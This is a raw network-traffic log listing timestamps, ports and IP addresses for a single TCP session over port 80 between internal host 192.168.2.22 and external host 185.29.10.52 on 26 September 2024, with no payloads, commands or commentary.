Sep 26, 2024 10:33:12.668379068 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.668427944 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.668430090 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.668463945 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.668509007 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.668541908 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.668574095 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.668618917 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.669301033 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.762279034 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.762319088 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.762350082 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.762372971 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.762407064 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.762420893 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.762440920 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.762475967 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.762490988 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.762526989 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.762573957 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.762847900 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.762928009 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.762978077 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.763072968 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.763164043 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.763197899 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.763210058 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.763256073 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.763286114 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.763298988 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.763318062 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.763350010 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.763370037 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.763911963 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.763957977 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.763961077 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.763993025 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.764039040 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.764100075 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.764133930 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.764167070 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.764178991 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.764198065 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.764245033 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.764811993 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.764879942 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.764913082 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.764930010 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.764981031 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.765012980 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.765028954 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.765043974 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.765075922 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.765088081 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.765697956 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.765742064 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.765778065 CEST  80  49163  185.29.10.52  192.168.2.22
                        Sep 26, 2024 10:33:12.765810013 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.765853882 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.765892982 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.765923023 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.765954018 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.765959024 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.765986919 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.766025066 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.858453035 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.858488083 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.858524084 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.858534098 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.858555079 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.858597040 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.858604908 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.858652115 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.858692884 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.858700991 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.858731985 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.858763933 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.858767986 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.858797073 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.858846903 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.859524965 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.859574080 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.859607935 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.859616995 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.859637976 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.859669924 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.859679937 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.859700918 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.859734058 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.859738111 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.860078096 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.860120058 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.860127926 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.860160112 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.860198021 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.860235929 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.860266924 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.860297918 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.860311985 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.860331059 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.860375881 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.860959053 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.861008883 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.861040115 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.861053944 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.861135960 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.861166954 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.861177921 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.861198902 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.861239910 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.861258984 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.861866951 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.861906052 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.861916065 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.861948013 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.861987114 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.862052917 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.862083912 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.862113953 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.862133026 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.862145901 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.862191916 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.862755060 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.862802982 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.862834930 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.862848043 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.862916946 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.862947941 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.862962961 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.862978935 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.863012075 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.863020897 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.863718033 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.863755941 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.863766909 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.863800049 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.863831043 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.863859892 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.863890886 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.863922119 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.863934040 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:12.863955975 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:12.863989115 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.017755985 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.017805099 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.017859936 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.017870903 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.017923117 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.017954111 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.017973900 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.017987967 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018033028 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.018038034 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018069983 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018101931 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018120050 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.018131018 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018162966 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018173933 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.018196106 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018244028 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.018245935 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018277884 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018321991 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.018326044 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018357992 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018388987 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018404961 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.018429041 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018461943 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018476963 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.018495083 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018526077 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018538952 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.018558025 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018589973 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018604994 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.018623114 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.018666983 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.020172119 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020205975 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020237923 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020251989 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.020287037 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020319939 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020332098 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.020411968 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020458937 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.020488977 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020523071 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020561934 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.020574093 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020621061 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020653963 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020668983 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.020687103 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020719051 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020734072 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.020759106 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020806074 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.020821095 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020853996 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020888090 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020900965 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.020915985 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.020963907 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.021034002 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.021084070 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.021116018 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.021128893 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.021205902 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.021238089 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.021255970 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.021270990 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.021312952 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.021476030 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.021527052 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.021559000 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.021569967 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.021591902 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.021625042 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.021639109 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.021657944 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.021704912 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.023497105 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023551941 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023582935 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023597956 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.023632050 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023663998 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023678064 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.023698092 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023730993 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023744106 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.023762941 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023796082 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023808002 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.023828030 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023869991 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.023919106 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023951054 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023983002 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.023998022 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.024014950 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.024063110 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.024377108 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.024427891 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.024470091 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.024477959 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.024530888 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.024563074 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.024576902 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.024595022 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.024626017 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.024636984 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.025158882 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025191069 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025203943 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.025224924 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025269032 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.025274038 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025306940 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025337934 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025352001 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.025372982 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025415897 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.025422096 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025455952 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025487900 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025501013 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.025520086 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025552034 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025563002 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.025585890 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025630951 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.025804996 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025837898 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025871038 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025883913 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.025918961 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025949955 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.025962114 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.025980949 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.026026011 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.026036024 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.026068926 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.026099920 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.026110888 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.113790035 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.113836050 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.113859892 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.113899946 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.113931894 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.113943100 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.113962889 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.113998890 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114006996 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114051104 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114097118 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114099979 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114132881 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114165068 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114178896 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114197016 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114240885 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114245892 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114278078 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114309072 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114325047 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114341974 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114387989 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114387989 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114420891 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114450932 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114470005 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114489079 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114521027 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114533901 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114569902 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114614964 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114619017 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114650965 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114681959 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114692926 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114717007 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114749908 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114763021 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114780903 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114811897 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114825964 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114840031 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114871979 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114886045 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114905119 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114937067 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.114947081 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.114968061 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.115000010 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.115008116 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.115035057 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.115067005 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.115086079 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.115098953 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.115130901 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.115143061 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.115161896 CEST8049163185.29.10.52192.168.2.22
